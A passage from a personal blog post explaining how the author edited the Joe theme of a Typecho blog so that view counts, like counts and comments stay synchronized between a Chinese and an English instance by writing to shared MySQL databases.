Query Post Like Count */ function _getAgree($item, $type = true) { - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $result = $db->fetchRow($db->select('agree')->from('table.contents')->where('cid = ?', $item->cid))['agree']; if ($type) echo number_format($result); else return number_format($result); } Modify the code displaying view counts on the homepage in <webroot>/en/usr/themes/Joe/core/route.php: $result[] = array( "mode" => $item->fields->mode ? $item->fields->mode : 'default', "image" => _getThumbnails($item), "time" => date('Y-m-d', $item->created), "created" => date('d/m/Y', $item->created), "title" => $item->title, "abstract" => _getAbstract($item, false), "category" => $item->categories, - "views" => number_format($item->views), + // "views" => number_format($item->views), + "views" => _getViews($item, false), "commentsNum" => number_format($item->commentsNum), - "agree" => number_format($item->agree), + // "agree" => number_format($item->agree), + "agree" => _getAgree($item, false), "permalink" => $item->permalink, "lazyload" => _getLazyload(false), "type" => "normal" ); The code displaying view counts on the article page itself already uses _getViews, so it doesn't need modification. Modify the code that increments view counts: /* Increase View Count - Tested √ */ function _handleViews($self) { $self->response->setStatus(200); $cid = $self->request->cid; /* SQL injection check */ if (!preg_match('/^\d+$/', $cid)) { return $self->response->throwJson(array("code" => 0, "data" => "Illegal request! Blocked!")); } - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $row = $db->fetchRow($db->select('views')->from('table.contents')->where('cid = ?', $cid)); if (sizeof($row) > 0) { Modify the code for liking and unliking: /* Like and Unlike - Tested √ */ function _handleAgree($self) { $self->response->setStatus(200); $cid = $self->request->cid; $type = $self->request->type; /* SQL injection check */ if (!preg_match('/^\d+$/', $cid)) { return $self->response->throwJson(array("code" => 0, "data" => "Illegal request! Blocked!")); } /* SQL injection check */ if (!preg_match('/^[agree|disagree]+$/', $type)) { return $self->response->throwJson(array("code" => 0, "data" => "Illegal request! Blocked!")); } - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $row = $db->fetchRow($db->select('agree')->from('table.contents')->where('cid = ?', $cid)); if (sizeof($row) > 0) { After making these changes and saving, visiting the English site should show view counts and like counts synchronized with the Chinese site. Sync Comments I initially thought about creating a plugin that hooks into the comment submission function to simultaneously insert comment data into the other instance's database. However, I found that my Joe theme already hooks into this, and adding another hook might cause conflicts. Therefore, I directly edited the Joe theme's code. Edit <webroot>/index/usr/themes/Joe/core/factory.php: <?php require_once("phpmailer.php"); require_once("smtp.php"); /* Enhanced Comment Interception */ Typecho_Plugin::factory('Widget_Feedback')->comment = array('Intercept', 'message'); class Intercept { public static function message($comment) { ... Typecho_Cookie::delete('__typecho_remember_text'); + + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho_en', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho_en' + ], Typecho_Db::READ | Typecho_Db::WRITE); + + $row = [ + 'coid' => $comment['coid'], // Must include the newly generated comment ID + 'cid' => $comment['cid'], + 'created' => $comment['created'], + 'author' => $comment['author'], + 'authorId' => $comment['authorId'], + 'ownerId' => $comment['ownerId'], + 'mail' => $comment['mail'], + 'url' => $comment['url'], + 'ip' => $comment['ip'], + 'agent' => $comment['agent'], + 'text' => $comment['text'], + 'type' => $comment['type'], + 'status' => $comment['status'], + 'parent' => $comment['parent'] + ]; + + // Insert data into the target database's `comments` table + $db->query($db->insert('typecho_comments')->rows($row)); return $comment; } } ... Perform the same operation on the English instance, inserting comments into the Chinese database. One issue with this scheme is that if you need to delete spam comments, you must delete them separately in both instances. I'll fix that later (maybe). Reference: typecho/languages - GitHub
19/11/2025
53 Views
0 Comments
0 Stars
1
2
...
6